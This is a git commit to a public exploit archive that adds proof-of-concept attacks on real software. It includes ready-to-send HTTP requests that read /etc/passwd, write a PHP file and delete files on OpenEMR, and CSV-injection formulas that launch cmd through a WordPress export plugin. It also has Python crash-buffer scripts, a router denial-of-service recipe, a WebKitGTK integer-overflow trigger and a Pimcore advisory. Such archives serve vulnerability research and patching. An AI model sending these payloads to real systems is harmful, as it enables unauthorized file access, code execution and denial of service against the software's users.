DB: 2018-08-17
8 changes to exploits/shellcodes TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC) ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC) Central Management Software 1.4.13 - Denial of Service (PoC) WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC) OpenEMR 5.0.1.3 - Arbitrary File Actions Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery
This commit is contained in:
parent
2e282df4a8
commit
0424dfc05b
9 changed files with 474 additions and 1 deletions
20
exploits/hardware/dos/45203.txt
Normal file
20
exploits/hardware/dos/45203.txt
Normal file
|
@ -0,0 +1,20 @@
|
||||||
|
# Exploit Title: TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)
|
||||||
|
# Exploit Author: Aniket Dinda
|
||||||
|
# Date: 2018-08-05
|
||||||
|
# Vendor Homepage: https://www.tp-link.com/
|
||||||
|
# Hardware Link: https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q
|
||||||
|
# Version: TP-Link Wireless N Router WR840N
|
||||||
|
# Firmware version : 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n
|
||||||
|
# Category: Hardware
|
||||||
|
# Tested on: Windows 10
|
||||||
|
# CVE: CVE-2018-15172
|
||||||
|
|
||||||
|
# Proof Of Concept:
|
||||||
|
|
||||||
|
1- First connect to this network
|
||||||
|
2- Open BurpSuite and then start the intercept, making the necessary proxy changes to the internet browser.
|
||||||
|
3- Goto Quick setup >
|
||||||
|
4- Now as the Burp is intercept is on, you will find an Authorization: Basic followed by a string.
|
||||||
|
5- Now we paste a string consisting of 2000 zeros.
|
||||||
|
6- Then forward the connection
|
||||||
|
7- Then your router automatically logout and net connection will be gone.
|
58
exploits/linux/local/45205.txt
Normal file
58
exploits/linux/local/45205.txt
Normal file
|
@ -0,0 +1,58 @@
|
||||||
|
# Exploit Title: WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC)
|
||||||
|
# Date: 2018-08-15
|
||||||
|
# Exploit Author: PeregrineX
|
||||||
|
# Vendor Homepage: https://webkitgtk.org/ & https://webkit.org/wpe/
|
||||||
|
# Software Link: https://webkitgtk.org/releases/ & https://wpewebkit.org/releases/
|
||||||
|
# Version: <2.20.3 (GTK+) <2.20.1 (WPE)
|
||||||
|
# Tested on: WebKitGTK+ 2.20.2
|
||||||
|
# CVE : CVE-2018-12293
|
||||||
|
|
||||||
|
# SUMMARY:
|
||||||
|
# getImageData() in ImageBufferCairo.cpp multiplies rect.width() * rect.height() * 4
|
||||||
|
# without any overflow checks. If result is larger than UINT_MAX,
|
||||||
|
# heap-based buffer overflow via integer overflow will occur,
|
||||||
|
# which could be exploited further.
|
||||||
|
|
||||||
|
# Works on WebKitGTK+ <2.20.3 and WPE WebKit <2.20.1
|
||||||
|
# Credit to ADlab of Venustech for originally finding this vulnerability.
|
||||||
|
|
||||||
|
Vulnerable Code (Source/WebCore/platform/graphics/cairo/ImageBufferCairo.cpp):
|
||||||
|
|
||||||
|
template <AlphaPremultiplication premultiplied>
|
||||||
|
RefPtr<Uint8ClampedArray> getImageData(const IntRect& rect, const IntRect& logicalRect, const ImageBufferData& data, const IntSize& size, const IntSize& logicalSize, float resolutionScale)
|
||||||
|
{
|
||||||
|
auto result = Uint8ClampedArray::createUninitialized(rect.width() * rect.height() * 4);
|
||||||
|
if (!result)
|
||||||
|
return nullptr;
|
||||||
|
//...
|
||||||
|
|
||||||
|
# Proof of Concept:
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<script>
|
||||||
|
funciton poc() {
|
||||||
|
var c = document.getElementById("myCanvas");
|
||||||
|
var ctx = c.getContext("2d");
|
||||||
|
var imgData = ctx.getImageData(0, 0, 32768, 32768);
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body onload="poc()">
|
||||||
|
<canvas id="myCanvas" width="32768" height="32768">No HTML5 canvas tag.</canvas>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
# Output snippet
|
||||||
|
UBSAN output:
|
||||||
|
../Source/JavaScriptCore/runtime/JSGlobalObject.cpp:1608:22: runtime error:
|
||||||
|
call to function (unknown) through pointer to incorrect function type
|
||||||
|
'JSC::RuntimeFlags (*)(const JSC::JSGlobalObject *)'
|
||||||
|
(/usr/local/lib/libwebkit2gtk-4.0.so.37+0x11116c70): note: (unknown) defined here
|
||||||
|
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior
|
||||||
|
../Source/JavaScriptCore/runtime/JSObject.h:695:17 in
|
||||||
|
DerivedSources/JavaScriptCore/KeywordLookup.h:469:13: runtime error:
|
||||||
|
load of misaligned address 0x7fd8a1d95062 for type 'const uint32_t'
|
||||||
|
(aka 'const unsigned int'), which requires 4 byte alignment
|
||||||
|
0x7fd8a1d95062: note: pointer points here
|
||||||
|
00 00 28 66 75 6e 63 74 69 6f 6e 20 28 74 68 69 73 56 61 6c 75 65 2c 20 61 72 67 75 6d 65 6e 74
|
||||||
|
^
|
|
@ -2,7 +2,7 @@
|
||||||
# Shodon Dork: iPECS CM
|
# Shodon Dork: iPECS CM
|
||||||
# Exploit Author: Safak Aslan
|
# Exploit Author: Safak Aslan
|
||||||
# Software Link: www.ipecs.com
|
# Software Link: www.ipecs.com
|
||||||
# Version: 30M (System)
|
# Version: 30M-B.2Ia and 30M-2.3Gn
|
||||||
# Authentication Required: No
|
# Authentication Required: No
|
||||||
# Tested on: Linux
|
# Tested on: Linux
|
||||||
# CVE: N/A
|
# CVE: N/A
|
||||||
|
|
88
exploits/linux/webapps/45202.txt
Normal file
88
exploits/linux/webapps/45202.txt
Normal file
|
@ -0,0 +1,88 @@
|
||||||
|
# Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions
|
||||||
|
# Date: 2018-08-14
|
||||||
|
# Exploit Author: Joshua Fam
|
||||||
|
# Twitter : @Insecurity
|
||||||
|
# Vendor Homepage: https://www.open-emr.org/
|
||||||
|
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
|
||||||
|
# Version: < 5.0.1.3
|
||||||
|
# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
|
||||||
|
# CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140
|
||||||
|
|
||||||
|
# 1.Arbitrary File Read:
|
||||||
|
# In OpenEmr a user that has access to the portal can send a malcious
|
||||||
|
# POST request to read arbitrary files.
|
||||||
|
|
||||||
|
# i.Vulnerable Code:
|
||||||
|
# if ($_POST['mode'] == 'get') {
|
||||||
|
# echo file_get_contents($_POST['docid']);
|
||||||
|
# exit;
|
||||||
|
# }
|
||||||
|
|
||||||
|
# ii. Proof of Concept:
|
||||||
|
POST /openemr/portal/import_template.php HTTP/1.1
|
||||||
|
Host: hostname
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 26
|
||||||
|
|
||||||
|
mode=get&docid=/etc/passwd
|
||||||
|
|
||||||
|
# 2.Arbitrary File Write:
|
||||||
|
# In OpenEmr a user that has access to the portal can send a malcious
|
||||||
|
# POST request to write arbitrary files.
|
||||||
|
|
||||||
|
# i. Vulnerable Code:
|
||||||
|
# } else if ($_POST['mode'] == 'save') {
|
||||||
|
# file_put_contents($_POST['docid'], $_POST['content']);
|
||||||
|
# exit(true);
|
||||||
|
# }
|
||||||
|
|
||||||
|
# ii. Proof of Concept:
|
||||||
|
POST /openemr/portal/import_template.php HTTP/1.1
|
||||||
|
Host: hostname
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 54
|
||||||
|
|
||||||
|
mode=save&docid=payload.php&content=<?php phpinfo();?>
|
||||||
|
|
||||||
|
# After sending this navigate to payload.php at http://hostname/openemr/portal
|
||||||
|
|
||||||
|
# 3. Arbitrary File Delete:
|
||||||
|
# In OpenEmr a user that has access to the portal can send a malcious
|
||||||
|
# POST request to delete a arbitrary file.
|
||||||
|
|
||||||
|
# i. Vulnerable Code:
|
||||||
|
# } else if ($_POST['mode'] == 'delete') {
|
||||||
|
# unlink($_POST['docid']);
|
||||||
|
# exit(true);
|
||||||
|
# }
|
||||||
|
|
||||||
|
# ii. Proof of Concept:
|
||||||
|
POST /openemr/portal/import_template.php HTTP/1.1
|
||||||
|
Host: 127.0.0.1
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 29
|
||||||
|
|
||||||
|
mode=delete&docid=payload.php
|
||||||
|
|
||||||
|
# After completing this request, when you navigate to payload.php, you should be greeted by a 404 page.
|
34
exploits/php/webapps/45206.txt
Normal file
34
exploits/php/webapps/45206.txt
Normal file
|
@ -0,0 +1,34 @@
|
||||||
|
# Exploit Title: Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection
|
||||||
|
# Exploit Author: Javier Olmedo
|
||||||
|
# Website: https://hackpuntes.com
|
||||||
|
# Date: 2018-08-14
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Vendor: Matt Cromwell
|
||||||
|
# Software Link: https://wordpress.org/plugins/export-users-to-csv/
|
||||||
|
# Affected Version: 1.1.1 and before
|
||||||
|
# Active installations: +20,000
|
||||||
|
# Patched Version: unpatched
|
||||||
|
# Category: Web Application
|
||||||
|
# Platform: PHP
|
||||||
|
# Tested on: Win10x64
|
||||||
|
|
||||||
|
# 1. Plugin Description:
|
||||||
|
# WordPress Export Users to CSV plugin exports user data and meta data.
|
||||||
|
# You can even export the users by role and registration date range.
|
||||||
|
|
||||||
|
# 2. Technical Description:
|
||||||
|
# WordPress Export users to CSV plugin version 1.1.1. and before are affected by Remote Code Execution
|
||||||
|
# through the CSV injection vulnerability. This allows an application user to inject commands as part
|
||||||
|
# of the fields of his profile and these commands are executed when a user with greater privilege
|
||||||
|
# exports the data in CSV and opens that file on his machine.
|
||||||
|
|
||||||
|
# 3. Proof Of Concept (PoC):
|
||||||
|
# Enter the payload =SUM(1+1)*cmd|' /C calc'!A0 in any field of the profile, for example, in biography.
|
||||||
|
# When the user with high privileges logs in to the application, export data in CSV and opens the
|
||||||
|
# generated file, the command is executed and the calculator will run open on the machine.
|
||||||
|
|
||||||
|
# 4. Payloads:
|
||||||
|
=SUM(1+1)*cmd|' /C calc'!A0
|
||||||
|
+SUM(1+1)*cmd|' /C calc'!A0
|
||||||
|
-SUM(1+1)*cmd|' /C calc'!A0
|
||||||
|
@SUM(1+1)*cmd|' /C calc'!A0
|
215
exploits/php/webapps/45208.txt
Normal file
215
exploits/php/webapps/45208.txt
Normal file
|
@ -0,0 +1,215 @@
|
||||||
|
SEC Consult Vulnerability Lab Security Advisory < 20180813-0 >
|
||||||
|
=======================================================================
|
||||||
|
title: SQL Injection, XSS & CSRF vulnerabilities
|
||||||
|
product: Pimcore
|
||||||
|
vulnerable version: 5.2.3 and below
|
||||||
|
fixed version: 5.3.0
|
||||||
|
CVE number: CVE-2018-14057, CVE-2018-14058, CVE-2018-14059
|
||||||
|
impact: High
|
||||||
|
homepage: https://pimcore.com/en
|
||||||
|
found: 2018-06-11
|
||||||
|
by: T. Silpavarangkura (Office Bangkok)
|
||||||
|
N. Rai-Ngoen (Office Bangkok)
|
||||||
|
SEC Consult Vulnerability Lab
|
||||||
|
|
||||||
|
An integrated part of SEC Consult
|
||||||
|
Europe | Asia | North America
|
||||||
|
|
||||||
|
https://www.sec-consult.com
|
||||||
|
|
||||||
|
=======================================================================
|
||||||
|
|
||||||
|
Vendor description:
|
||||||
|
-------------------
|
||||||
|
"Pimcore is an award-winning consolidated open source enterprise platform for
|
||||||
|
master data management (PIM/MDM), user experience management (CMS/UX), digital
|
||||||
|
asset management (DAM) and eCommerce."
|
||||||
|
|
||||||
|
Source: https://pimcore.com/en
|
||||||
|
|
||||||
|
|
||||||
|
Business recommendation:
|
||||||
|
------------------------
|
||||||
|
The vendor provides a patch for most identified issues, but XSS will not be fixed
|
||||||
|
according to the vendor.
|
||||||
|
|
||||||
|
An in-depth security analysis performed by security professionals is highly
|
||||||
|
advised, as the software may be affected from further security issues.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability overview/description:
|
||||||
|
-----------------------------------
|
||||||
|
1. SQL Injection (CVE-2018-14058)
|
||||||
|
Multiple SQL injection vulnerabilities have been identified in the REST web
|
||||||
|
service API. An attacker who obtains a valid API key that is granted a
|
||||||
|
necessary permission could successfully perform an attack to extract
|
||||||
|
information from the database.
|
||||||
|
|
||||||
|
2. Stored Cross-site Scripting (CVE-2018-14059)
|
||||||
|
Multiple stored cross-site scripting vulnerabilities have been identified
|
||||||
|
across multiple functions in the application, which allows an authenticated
|
||||||
|
attacker to insert arbitrary JavaScript code in virtually all text fields and
|
||||||
|
data entries in the application.
|
||||||
|
|
||||||
|
3. Cross-site Request Forgery (CVE-2018-14057)
|
||||||
|
Multiple functions in the application are not protected by the existing
|
||||||
|
anti-CSRF token, which allows an attacker to perform a cross-site request
|
||||||
|
forgery attack to at least add, update or delete entries, among other actions.
|
||||||
|
|
||||||
|
|
||||||
|
Proof of concept:
|
||||||
|
-----------------
|
||||||
|
1. SQL Injection (CVE-2018-14058)
|
||||||
|
The following URLs demonstrate the issue:
|
||||||
|
http://<host>/webservice/rest/asset-count?apikey=[...]&condition=<SQL Injection>
|
||||||
|
http://<host>/webservice/rest/asset-inquire?apikey=[...]&id=<SQL Injection>
|
||||||
|
http://<host>/webservice/rest/asset-list?apikey=[...]&condition=<SQL Injection>
|
||||||
|
http://<host>/webservice/rest/document-count?apikey=[...]&condition=<SQL Injection>
|
||||||
|
http://<host>/webservice/rest/document-inquire?apikey=[...]&id=<SQL Injection>
|
||||||
|
http://<host>/webservice/rest/document-list?apikey=[...]&condition=<SQL Injection>
|
||||||
|
http://<host>/webservice/rest/object-count?apikey=[...]&condition=<SQL Injection>
|
||||||
|
http://<host>/webservice/rest/object-inquire?apikey=[...]&id=<SQL Injection>
|
||||||
|
http://<host>/webservice/rest/object-list?apikey=[...]&condition=<SQL Injection>
|
||||||
|
|
||||||
|
Note that a valid API key that is granted at least either "Assets", "Documents"
|
||||||
|
or "Objects" permission is required to perform an SQL injection attack against
|
||||||
|
associated API endpoints successfully.
|
||||||
|
|
||||||
|
|
||||||
|
2. Stored Cross-site Scripting (CVE-2018-14059)
|
||||||
|
Most of the text fields in pop-up dialogs and data entries in the application
|
||||||
|
are vulnerable to the cross-site scripting vulnerability, which can be
|
||||||
|
exploited by an authenticated attacker. For example, the attacker could insert
|
||||||
|
an attack payload while performing at least the following actions:
|
||||||
|
|
||||||
|
1) Edit a user account's first name/last name/e-mail address.
|
||||||
|
2) Edit a Document Types/Predefined Properties/Predefined Asset Metadata/
|
||||||
|
Quantity Value/Static Routes entry value in the table.
|
||||||
|
3) Rename an Assets/Data Objects/Video Thumbnails/Image Thumbnails/
|
||||||
|
Field-Collections/Objectbrick/Classification Store item.
|
||||||
|
|
||||||
|
|
||||||
|
The vendor stated that many identified XSS issues only affect administrative
|
||||||
|
functions and hence the issues will not be fixed:
|
||||||
|
"They are only affecting administrative functionalities (higher privileges
|
||||||
|
required) - so this isn't used by non-trusted users - a check just adds
|
||||||
|
additional overhead without any benefits for security."
|
||||||
|
|
||||||
|
SEC Consult argued multiple times that XSS can still be exploited e.g. when a
|
||||||
|
higher privileged user gets attacked and the issues should be fixed nevertheless.
|
||||||
|
|
||||||
|
|
||||||
|
3. Cross-site Request Forgery (CVE-2018-14057)
|
||||||
|
The existing anti-CSRF token in the HTTP request header named
|
||||||
|
"X-pimcore-csrf-token" was found to be validated only in the "Settings >
|
||||||
|
Users / Roles" function. Therefore, an attacker could perform a cross-site
|
||||||
|
request forgery attack against virtually all other functions in order to
|
||||||
|
at least add, update and delete data without having to submit the anti-CSRF
|
||||||
|
token.
|
||||||
|
|
||||||
|
The non-exhaustive list of affected requests are listed below:
|
||||||
|
POST /admin/asset/add-asset
|
||||||
|
POST /admin/asset/add-asset-compatibility
|
||||||
|
GET /admin/asset/delete
|
||||||
|
GET /admin/asset/import-server
|
||||||
|
GET /admin/asset/import-server-files
|
||||||
|
GET /admin/asset/import-url
|
||||||
|
POST /admin/asset/import-zip
|
||||||
|
POST /admin/asset/update
|
||||||
|
GET /admin/document/add
|
||||||
|
GET /admin/document/delete
|
||||||
|
POST /admin/document/doc-types
|
||||||
|
POST /admin/email/blacklist
|
||||||
|
POST /admin/email/email-logs
|
||||||
|
POST /admin/email/save
|
||||||
|
POST /admin/hardlink/save
|
||||||
|
POST /admin/link/save
|
||||||
|
POST /admin/newsletter/save
|
||||||
|
GET /admin/object/add
|
||||||
|
POST /admin/object/save
|
||||||
|
GET /admin/object/delete
|
||||||
|
POST /admin/page/save
|
||||||
|
POST /admin/settings/metadata
|
||||||
|
POST /admin/settings/properties
|
||||||
|
POST /admin/settings/set-system
|
||||||
|
POST /admin/settings/website-settings
|
||||||
|
POST /admin/snippet/save
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable / tested versions:
|
||||||
|
-----------------------------
|
||||||
|
The vulnerabilities have been identified in Pimcore version 5.2.3 which was the
|
||||||
|
most current version at the time of discovery.
|
||||||
|
|
||||||
|
|
||||||
|
Vendor contact timeline:
|
||||||
|
------------------------
|
||||||
|
2018-06-15: Contacting vendor through
|
||||||
|
https://pimcorehq.wufoo.com/forms/pimcore-security-report
|
||||||
|
2018-06-18: Vendor provides the fixes of SQL injection and CSRF in the nightly
|
||||||
|
build, but has a problem of reproducing the XSS.
|
||||||
|
2018-06-18: Contacting vendor to request for a secure channel to provide
|
||||||
|
further details of the XSS.
|
||||||
|
2018-06-18: Sending the details of the XSS.
|
||||||
|
2018-06-19: Vendor fixes the SQL injection and only fixes the XSS partially.
|
||||||
|
2018-06-20: Notifying vendor, that SQL injection and XSS are not properly fixed
|
||||||
|
2018-06-20: Vendor inquires more details about the XSS.
|
||||||
|
2018-06-21: Explaining vendor the XSS issues and notifying vendor that the CSRF
|
||||||
|
has been fixed.
|
||||||
|
2018-06-21: Vendor will discuss the open issues internally.
|
||||||
|
2018-07-11: Following up vendor regarding the fixes of the open issues.
|
||||||
|
2018-07-11: Vendor completely fixes the SQL injection, but decides not to fix
|
||||||
|
the XSS in the administrative functions, patch release is planned
|
||||||
|
within the next two weeks
|
||||||
|
2018-07-20: Vendor provides a patched version
|
||||||
|
2018-08-13: Public release of security advisory
|
||||||
|
|
||||||
|
|
||||||
|
Solution:
|
||||||
|
---------
|
||||||
|
The vendor has published a new release (version 5.3.0) which fixes most of the
|
||||||
|
identified issues, but not the XSS issues that affect administrative functions:
|
||||||
|
|
||||||
|
https://pimcore.com/en/download
|
||||||
|
|
||||||
|
|
||||||
|
Workaround:
|
||||||
|
-----------
|
||||||
|
None
|
||||||
|
|
||||||
|
|
||||||
|
Advisory URL:
|
||||||
|
-------------
|
||||||
|
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
|
||||||
|
|
||||||
|
|
||||||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||||
|
|
||||||
|
SEC Consult Vulnerability Lab
|
||||||
|
|
||||||
|
SEC Consult
|
||||||
|
Europe | Asia | North America
|
||||||
|
|
||||||
|
About SEC Consult Vulnerability Lab
|
||||||
|
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
|
||||||
|
ensures the continued knowledge gain of SEC Consult in the field of network
|
||||||
|
and application security to stay ahead of the attacker. The SEC Consult
|
||||||
|
Vulnerability Lab supports high-quality penetration testing and the evaluation
|
||||||
|
of new offensive and defensive technologies for our customers. Hence our
|
||||||
|
customers obtain the most current information about vulnerabilities and valid
|
||||||
|
recommendation about the risk profile of new technologies.
|
||||||
|
|
||||||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||||
|
Interested to work with the experts of SEC Consult?
|
||||||
|
Send us your application https://www.sec-consult.com/en/career/index.html
|
||||||
|
|
||||||
|
Interested in improving your cyber security with the experts of SEC Consult?
|
||||||
|
Contact our local offices https://www.sec-consult.com/en/contact/index.html
|
||||||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||||
|
|
||||||
|
Mail: research at sec-consult dot com
|
||||||
|
Web: https://www.sec-consult.com
|
||||||
|
Blog: http://blog.sec-consult.com
|
||||||
|
Twitter: https://twitter.com/sec_consult
|
||||||
|
|
||||||
|
EOF Thongchai Silpavarangkura / @2018
|
26
exploits/windows_x86-64/dos/45204.py
Executable file
26
exploits/windows_x86-64/dos/45204.py
Executable file
|
@ -0,0 +1,26 @@
|
||||||
|
# Exploit Title: ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)
|
||||||
|
# Author: Gionathan "John" Reale
|
||||||
|
# Discovey Date: 2018-08-16
|
||||||
|
# Homepage: https://www.ambientweather.com
|
||||||
|
# Software Link: https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/iptools/IPTools64bit.exe
|
||||||
|
# Tested Version: 1.4.0.1
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
|
||||||
|
# Steps to Reproduce: Run the python exploit script, it will create a new
|
||||||
|
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
|
||||||
|
# and start the program. Now click "Okay" and in the new window paste the content of
|
||||||
|
# "exploit.txt" into the following fields:"IP". Click "Search" and you will see a crash.
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 2000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("exploit.txt","w")
|
||||||
|
print "[+] Creating %s bytes evil payload.." %len(payload)
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print "[+] File created!"
|
||||||
|
except:
|
||||||
|
print "File cannot be created"
|
25
exploits/windows_x86-64/dos/45207.py
Executable file
25
exploits/windows_x86-64/dos/45207.py
Executable file
|
@ -0,0 +1,25 @@
|
||||||
|
# Exploit Title: Central Management Software v1.4.13 - Denial of Service (PoC)
|
||||||
|
# Author: Gionathan "John" Reale
|
||||||
|
# Discovey Date: 2018-08-16
|
||||||
|
# Homepage: https://www.ambientweather.com
|
||||||
|
# Software Link: https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/Manuals/ambientcam/04_central_management_software.zip
|
||||||
|
# Tested Version: 1.4.13
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# Steps to Reproduce: Run the python exploit script, it will create a new
|
||||||
|
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
|
||||||
|
# and start the CMS client program. In the new window paste the content of
|
||||||
|
# "exploit.txt" into the following fields:"Password". Click "Login" and you will see a crash.
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 2000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("exploit.txt","w")
|
||||||
|
print "[+] Creating %s bytes evil payload.." %len(payload)
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print "[+] File created!"
|
||||||
|
except:
|
||||||
|
print "File cannot be created"
|
|
@ -6046,6 +6046,9 @@ id,file,description,date,author,type,platform,port
|
||||||
45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware,
|
45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware,
|
||||||
45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86,
|
45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86,
|
||||||
45199,exploits/hardware/dos/45199.txt,"JioFi 4G M2S 1.0.2 - Denial of Service (PoC)",2018-08-15,"Vikas Chaudhary",dos,hardware,
|
45199,exploits/hardware/dos/45199.txt,"JioFi 4G M2S 1.0.2 - Denial of Service (PoC)",2018-08-15,"Vikas Chaudhary",dos,hardware,
|
||||||
|
45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,
|
||||||
|
45204,exploits/windows_x86-64/dos/45204.py,"ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64,
|
||||||
|
45207,exploits/windows_x86-64/dos/45207.py,"Central Management Software 1.4.13 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||||
|
@ -9873,6 +9876,7 @@ id,file,description,date,author,type,platform,port
|
||||||
45184,exploits/linux/local/45184.sh,"PostgreSQL 9.4-0.5.3 - Privilege Escalation",2018-08-13,"Johannes Segitz",local,linux,
|
45184,exploits/linux/local/45184.sh,"PostgreSQL 9.4-0.5.3 - Privilege Escalation",2018-08-13,"Johannes Segitz",local,linux,
|
||||||
45192,exploits/android/local/45192.txt,"Android - Directory Traversal over USB via Injection in blkid Output",2018-08-13,"Google Security Research",local,android,
|
45192,exploits/android/local/45192.txt,"Android - Directory Traversal over USB via Injection in blkid Output",2018-08-13,"Google Security Research",local,android,
|
||||||
45194,exploits/windows_x86-64/local/45194.py,"Wansview 1.0.2 - Denial of Service (PoC)",2018-08-14,"Gionathan Reale",local,windows_x86-64,
|
45194,exploits/windows_x86-64/local/45194.py,"Wansview 1.0.2 - Denial of Service (PoC)",2018-08-14,"Gionathan Reale",local,windows_x86-64,
|
||||||
|
45205,exploits/linux/local/45205.txt,"WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC)",2018-08-16,PeregrineX,local,linux,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -39799,4 +39803,7 @@ id,file,description,date,author,type,platform,port
|
||||||
